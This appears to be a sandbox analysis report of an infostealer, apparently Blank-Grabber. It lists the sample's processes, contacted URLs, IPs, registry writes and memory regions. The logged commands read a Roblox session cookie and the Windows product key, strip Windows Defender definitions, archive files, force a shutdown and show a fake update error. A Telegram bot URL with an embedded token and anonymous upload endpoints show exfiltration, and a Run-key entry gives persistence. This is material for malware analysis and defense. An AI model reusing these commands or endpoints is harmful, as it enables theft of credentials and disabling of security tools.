||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Users\user\AppData\Roaming\word.exe
|
"C:\Users\user\AppData\Roaming\word.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip"
*"
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe
|
C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
|
||
C:\Users\user\AppData\Roaming\word.exe
|
"C:\Users\user\AppData\Roaming\word.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic os get Caption
|
||
C:\Program Files\Windows Defender\MpCmdRun.exe
|
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic computersystem get totalphysicalmemory
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic csproduct get uuid
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment'
-Name PROCESSOR_IDENTIFIER"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic path win32_VideoController get name
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform'
-Name BackupProductKeyDefault"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name
BackupProductKeyDefault
|
||
C:\Users\user\AppData\Roaming\word.exe
|
C:\Users\user\AppData\Roaming\word.exe
|
||
C:\Users\user\AppData\Roaming\word.exe
|
C:\Users\user\AppData\Roaming\word.exe
|
||
C:\Windows\System32\shutdown.exe
|
shutdown.exe /f /s /t 0
|
||
C:\Users\user\AppData\Roaming\word.exe
|
C:\Users\user\AppData\Roaming\word.exe
|
||
C:\Users\user\AppData\Roaming\word.exe
|
C:\Users\user\AppData\Roaming\word.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\mshta.exe
|
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to
retry.', 0, 'Error', 0+16);close()"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp"
"c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 97 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
198.23.219.104
|
|||
https://api.telegram.org/bot
|
unknown
|
||
http://logo.ver6
|
unknown
|
||
https://github.com/Blank-c/BlankOBF
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://github.com/Blank-c/Blank-Grabberi
|
unknown
|
||
https://www.ctrip.com/
|
unknown
|
||
https://github.com/Blank-c/Blank-Grabberr
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://tools.ietf.org/html/rfc2388#section-4.4
|
unknown
|
||
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
|
unknown
|
||
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
https://weibo.com/
|
unknown
|
||
https://api.anonfiles.com/upload
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://discord.com/api/v9/users/
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
|
unknown
|
||
http://cacerts.digi
|
unknown
|
||
https://peps.python.org/pep-0205/
|
unknown
|
||
https://www.reddit.com/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
|
unknown
|
||
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
|
unknown
|
||
https://www.ebay.co.uk/
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://www.ebay.de/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://github.com/python/cpython/issues/86361.
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://httpbin.org/
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.youtube.com/
|
unknown
|
||
https://allegro.pl/
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://go.mic
|
unknown
|
||
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
|
unknown
|
||
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
https://www.python.org/psf/license/
|
unknown
|
||
https://www.bbc.co.uk/
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
https://api.anonfiles.com/uploadr
|
unknown
|
||
http://tools.ietf.org/html/rfc6125#section-6.4.3
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://google.com/mail
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
https://www.python.org/psf/license/)
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://www.iqiyi.com/
|
unknown
|
||
https://foss.heptapod.net/pypy/pypy/-/issues/3539
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
|
unknown
|
||
http://google.com/
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
|
unknown
|
||
https://api.gofile.io/getServerr
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://tools.ietf.org/html/rfc7231#section-4.3.6)
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://discordapp.com/api/v9/users/
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
|
unknown
|
||
https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument
|
149.154.167.220
|
||
http://ip-api.com/json/?fields=225545r
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2920
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
|
unknown
|
||
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
|
unknown
|
||
https://yahoo.com/
|
unknown
|
||
https://account.bellmedia.c
|
unknown
|
||
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp_U
|
unknown
|
||
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
https://html.spec.whatwg.org/multipage/
|
unknown
|
||
https://www.ifeng.com/
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
|
unknown
|
||
https://www.rfc-editor.org/rfc/rfc8259#section-8.1
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://api.gofile.io/getServer
|
unknown
|
||
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
api.telegram.org
|
149.154.167.220
|
||
ip-api.com
|
208.95.112.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
198.23.219.104
|
unknown
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
208.95.112.1
|
ip-api.com
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
|
1280x1024x32(BGR 0)
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
word
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bound_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4387
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4407
|
There are 9 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1D372114000
|
heap
|
page read and write
|
||
1D372112000
|
heap
|
page read and write
|
||
31B1000
|
trusted library allocation
|
page read and write
|
||
281ABA90000
|
heap
|
page read and write
|
||
281ABA90000
|
heap
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
281ABA90000
|
heap
|
page read and write
|
||
2617000
|
trusted library allocation
|
page read and write
|
||
281ABC20000
|
direct allocation
|
page read and write
|
||
281AC037000
|
heap
|
page read and write
|
||
281ABA90000
|
heap
|
page read and write
|
||
2F2000
|
unkown
|
page readonly
|
||
281AC033000
|
heap
|
page read and write
|
||
281ABA90000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
19525FED000
|
heap
|
page read and write
|
||
7FFD9A7C0000
|
trusted library allocation
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
7FFD9A7FC000
|
trusted library allocation
|
page execute and read and write
|
||
21B78EE0000
|
heap
|
page read and write
|
||
281AB627000
|
heap
|
page read and write
|
||
281AC9BA000
|
heap
|
page read and write
|
||
15D0000
|
heap
|
page read and write
|
||
1164000
|
heap
|
page read and write
|
||
1B8AC234000
|
heap
|
page read and write
|
||
174F199C000
|
heap
|
page read and write
|
||
23BCCB14000
|
heap
|
page read and write
|
||
2224EF1B000
|
heap
|
page read and write
|
||
D19917F000
|
stack
|
page read and write
|
||
174F199C000
|
heap
|
page read and write
|
||
281AC8D0000
|
direct allocation
|
page read and write
|
||
1C098BDD000
|
heap
|
page read and write
|
||
1C098B10000
|
heap
|
page read and write
|
||
7FFE11EE0000
|
unkown
|
page execute and read and write
|
||
7FFDFA9A1000
|
unkown
|
page execute and read and write
|
||
7FFD9A7A3000
|
trusted library allocation
|
page execute and read and write
|
||
281ABEF0000
|
heap
|
page read and write
|
||
281AB963000
|
heap
|
page read and write
|
||
7FFD9A870000
|
trusted library allocation
|
page execute and read and write
|
||
1BFD0450000
|
heap
|
page read and write
|
||
1D0CCE20000
|
heap
|
page read and write
|
||
82985FE000
|
stack
|
page read and write
|
||
1670000
|
heap
|
page read and write
|
||
281AC9C6000
|
heap
|
page read and write
|
||
1EC76621000
|
heap
|
page read and write
|
||
281AB64C000
|
heap
|
page read and write
|
||
1FCD60B0000
|
heap
|
page read and write
|
||
26469AF5000
|
heap
|
page read and write
|
||
222498B1000
|
heap
|
page read and write
|
||
16CEEF16000
|
heap
|
page read and write
|
||
174F197B000
|
heap
|
page read and write
|
||
227EEE10000
|
heap
|
page read and write
|
||
1F224A2A000
|
heap
|
page read and write
|
||
7FFD9AA10000
|
trusted library allocation
|
page read and write
|
||
1B82E000
|
stack
|
page read and write
|
||
281AC0C6000
|
heap
|
page read and write
|
||
281AC8A0000
|
direct allocation
|
page read and write
|
||
CA862FF000
|
unkown
|
page read and write
|
||
106B000
|
heap
|
page read and write
|
||
2463ED8D000
|
trusted library allocation
|
page read and write
|
||
CE770FF000
|
unkown
|
page read and write
|
||
2A1302B6000
|
heap
|
page read and write
|
||
11A1000
|
heap
|
page read and write
|
||
281AB6D0000
|
heap
|
page read and write
|
||
2A75F520000
|
heap
|
page read and write
|
||
7FFE14630000
|
unkown
|
page readonly
|
||
159F000
|
stack
|
page read and write
|
||
1DFEFC3E000
|
heap
|
page read and write
|
||
1CC4C000
|
stack
|
page read and write
|
||
7FFD9A980000
|
trusted library allocation
|
page execute and read and write
|
||
7FFDFB641000
|
unkown
|
page execute and read and write
|
||
1172000
|
heap
|
page read and write
|
||
E8C8C7F000
|
stack
|
page read and write
|
||
281AB5E0000
|
heap
|
page read and write
|
||
2462EA80000
|
heap
|
page execute and read and write
|
||
23BCD010000
|
heap
|
page read and write
|
||
281ABB0D000
|
heap
|
page read and write
|
||
7FF644871000
|
unkown
|
page execute read
|
||
2F000FE000
|
stack
|
page read and write
|
||
1FCD6193000
|
heap
|
page read and write
|
||
1FCD61C6000
|
heap
|
page read and write
|
||
1C098BF0000
|
heap
|
page read and write
|
||
2155AA94000
|
heap
|
page read and write
|
||
12A5E0A5000
|
heap
|
page read and write
|
||
2074DB10000
|
heap
|
page read and write
|
||
1DFEFC43000
|
heap
|
page read and write
|
||
1FCD67D8000
|
heap
|
page read and write
|
||
23BCD01F000
|
heap
|
page read and write
|
||
174F1B38000
|
heap
|
page read and write
|
||
174F1946000
|
heap
|
page read and write
|
||
19524FBD000
|
heap
|
page read and write
|
||
246302FD000
|
trusted library allocation
|
page read and write
|
||
7FFD9AAA0000
|
trusted library allocation
|
page read and write
|
||
1DFEFC7B000
|
heap
|
page read and write
|
||
281AB6B7000
|
heap
|
page read and write
|
||
1412F738000
|
heap
|
page read and write
|
||
174F1A3D000
|
trusted library allocation
|
page read and write
|
||
281ABF1D000
|
heap
|
page read and write
|
||
7375FFD000
|
stack
|
page read and write
|
||
23BCE990000
|
heap
|
page read and write
|
||
1DA81880000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
2DDB4EE4000
|
heap
|
page read and write
|
||
1BF1F000
|
heap
|
page read and write
|
||
20354F20000
|
heap
|
page read and write
|
||
1DFEFC4A000
|
heap
|
page read and write
|
||
281AC538000
|
direct allocation
|
page read and write
|
||
7FF644871000
|
unkown
|
page execute read
|
||
1C099200000
|
heap
|
page read and write
|
||
1DFF31D0000
|
direct allocation
|
page read and write
|
||
2224F350000
|
trusted library allocation
|
page read and write
|
||
2684AE70000
|
heap
|
page read and write
|
||
19525FE5000
|
heap
|
page read and write
|
||
2890000
|
heap
|
page read and write
|
||
2538CB55000
|
heap
|
page read and write
|
||
1BFD0640000
|
heap
|
page read and write
|
||
21B794FC000
|
heap
|
page read and write
|
||
16CEF150000
|
trusted library allocation
|
page read and write
|
||
1C09922E000
|
heap
|
page read and write
|
||
23699F85000
|
heap
|
page read and write
|
||
1DFEFC6D000
|
heap
|
page read and write
|
||
19525F95000
|
heap
|
page read and write
|
||
174F1A37000
|
trusted library allocation
|
page read and write
|
||
23BCCB1A000
|
heap
|
page read and write
|
||
281ABA0D000
|
heap
|
page read and write
|
||
23BCC92A000
|
heap
|
page read and write
|
||
19525FAB000
|
heap
|
page read and write
|
||
281AB662000
|
heap
|
page read and write
|
||
25F37827000
|
heap
|
page read and write
|
||
1F23D3B0000
|
heap
|
page read and write
|
||
1215000
|
heap
|
page read and write
|
||
12FE1000
|
trusted library allocation
|
page read and write
|
||
25F379C0000
|
heap
|
page read and write
|
||
23E907C1000
|
heap
|
page read and write
|
||
21B7ADEE000
|
heap
|
page read and write
|
||
1C09921F000
|
heap
|
page read and write
|
||
7FFE13381000
|
unkown
|
page execute and read and write
|
||
C8A5DCC000
|
stack
|
page read and write
|
||
1F2230CD000
|
heap
|
page read and write
|
||
1DFF1644000
|
heap
|
page read and write
|
||
7FFD9A793000
|
trusted library allocation
|
page execute and read and write
|
||
281ACBED000
|
heap
|
page read and write
|
||
7FF71F13E000
|
unkown
|
page readonly
|
||
281ACB27000
|
heap
|
page read and write
|
||
23BCC925000
|
heap
|
page read and write
|
||
16CEEF70000
|
heap
|
page read and write
|
||
20354F27000
|
heap
|
page read and write
|
||
2A75F5D8000
|
heap
|
page read and write
|
||
2262DA11000
|
heap
|
page read and write
|
||
7FFD9AA50000
|
trusted library allocation
|
page read and write
|
||
281ABECD000
|
heap
|
page read and write
|
||
23BCE992000
|
heap
|
page read and write
|
||
174F1A20000
|
trusted library allocation
|
page read and write
|
||
318E000
|
stack
|
page read and write
|
||
23BCCB1E000
|
heap
|
page read and write
|
||
7DFCAFF000
|
stack
|
page read and write
|
||
21253210000
|
heap
|
page read and write
|
||
264FC1F6000
|
heap
|
page read and write
|
||
26469A92000
|
heap
|
page read and write
|
||
281ABEC3000
|
heap
|
page read and write
|
||
1BFD0750000
|
heap
|
page read and write
|
||
10E5000
|
heap
|
page read and write
|
||
281ACA05000
|
heap
|
page read and write
|
||
24647399000
|
heap
|
page read and write
|
||
7FFDFAE99000
|
unkown
|
page execute and read and write
|
||
1C098C45000
|
heap
|
page read and write
|
||
281AB962000
|
heap
|
page read and write
|
||
2DDB4EEB000
|
heap
|
page read and write
|
||
21B78F00000
|
trusted library allocation
|
page read and write
|
||
7FFE0EC40000
|
unkown
|
page readonly
|
||
2224EDD0000
|
trusted library allocation
|
page read and write
|
||
19525FAB000
|
heap
|
page read and write
|
||
26469A68000
|
heap
|
page read and write
|
||
281AC9CC000
|
heap
|
page read and write
|
||
21B78FA4000
|
heap
|
page read and write
|
||
2DDB4E70000
|
heap
|
page read and write
|
||
281AC08E000
|
heap
|
page read and write
|
||
16002904000
|
heap
|
page read and write
|
||
7FFE130C0000
|
unkown
|
page readonly
|
||
16CEEEC6000
|
heap
|
page read and write
|
||
281AB6D6000
|
heap
|
page read and write
|
||
281A9B70000
|
heap
|
page read and write
|
||
281AC102000
|
heap
|
page read and write
|
||
2ED0000
|
heap
|
page read and write
|
||
2462FFAF000
|
trusted library allocation
|
page read and write
|
||
19525EE1000
|
heap
|
page read and write
|
||
227EEFC0000
|
heap
|
page read and write
|
||
16CEEEDD000
|
heap
|
page read and write
|
||
7FFD9A7D3000
|
trusted library allocation
|
page execute and read and write
|
||
2262D970000
|
heap
|
page read and write
|
||
1DB90000
|
heap
|
page read and write
|
||
19525FDD000
|
heap
|
page read and write
|
||
281AB93A000
|
heap
|
page read and write
|
||
19525FDD000
|
heap
|
page read and write
|
||
21B794EE000
|
heap
|
page read and write
|
||
77B000
|
heap
|
page read and write
|
||
19524800000
|
heap
|
page read and write
|
||
1C09924A000
|
heap
|
page read and write
|
||
21253210000
|
heap
|
page read and write
|
||
215478E4000
|
heap
|
page read and write
|
||
246472B1000
|
heap
|
page read and write
|
||
264FC1F2000
|
heap
|
page read and write
|
||
281ABEBA000
|
heap
|
page read and write
|
||
281AB9C6000
|
heap
|
page read and write
|
||
23BCC932000
|
heap
|
page read and write
|
||
7FFD9A7C0000
|
trusted library allocation
|
page read and write
|
||
1F224A24000
|
heap
|
page read and write
|
||
2646A28C000
|
heap
|
page read and write
|
||
F20CC7E000
|
stack
|
page read and write
|
||
7FF6448B2000
|
unkown
|
page read and write
|
||
281AD1D0000
|
direct allocation
|
page read and write
|
||
281ABA9A000
|
heap
|
page read and write
|
||
281AC08B000
|
heap
|
page read and write
|
||
1BD7E000
|
stack
|
page read and write
|
||
21B78F93000
|
heap
|
page read and write
|
||
1FCD67F3000
|
heap
|
page read and write
|
||
281AC9CE000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
7DF4C1460000
|
trusted library allocation
|
page execute and read and write
|
||
12A5E0CC000
|
heap
|
page read and write
|
||
13EE000
|
heap
|
page read and write
|
||
12A5E0D9000
|
heap
|
page read and write
|
||
1FCD6334000
|
heap
|
page read and write
|
||
1380000
|
heap
|
page read and write
|
||
281AB651000
|
heap
|
page read and write
|
||
70EAF0E000
|
stack
|
page read and write
|
||
281AC510000
|
direct allocation
|
page read and write
|
||
281AC07C000
|
heap
|
page read and write
|
||
14CC05D0000
|
heap
|
page read and write
|
||
7FFD9A96A000
|
trusted library allocation
|
page read and write
|
||
7375CE8000
|
stack
|
page read and write
|
||
7FFDFAA27000
|
unkown
|
page execute and read and write
|
||
2646A2A9000
|
heap
|
page read and write
|
||
7FFE11EC1000
|
unkown
|
page execute and read and write
|
||
281ABEDC000
|
heap
|
page read and write
|
||
1328000
|
heap
|
page read and write
|
||
23BCC925000
|
heap
|
page read and write
|
||
16CEEF3C000
|
heap
|
page read and write
|
||
2DDB4EBB000
|
heap
|
page read and write
|
||
1F226776000
|
trusted library allocation
|
page read and write
|
||
16CEEF16000
|
heap
|
page read and write
|
||
19522D1F000
|
heap
|
page read and write
|
||
7FFD9A7CD000
|
trusted library allocation
|
page execute and read and write
|
||
1A5F0000
|
trusted library allocation
|
page read and write
|
||
23BCC913000
|
heap
|
page read and write
|
||
1B815000
|
stack
|
page read and write
|
||
25B4F060000
|
heap
|
page read and write
|
||
21B78FD7000
|
heap
|
page read and write
|
||
23BCC913000
|
heap
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
12A5E097000
|
heap
|
page read and write
|
||
7FFD9A80C000
|
trusted library allocation
|
page execute and read and write
|
||
281AC11C000
|
heap
|
page read and write
|
||
636AD7C000
|
stack
|
page read and write
|
||
2DDB4E10000
|
heap
|
page read and write
|
||
174F1B38000
|
heap
|
page read and write
|
||
264FC180000
|
heap
|
page read and write
|
||
1EC76530000
|
heap
|
page read and write
|
||
281AC10E000
|
heap
|
page read and write
|
||
2DDB4DE0000
|
heap
|
page read and write
|
||
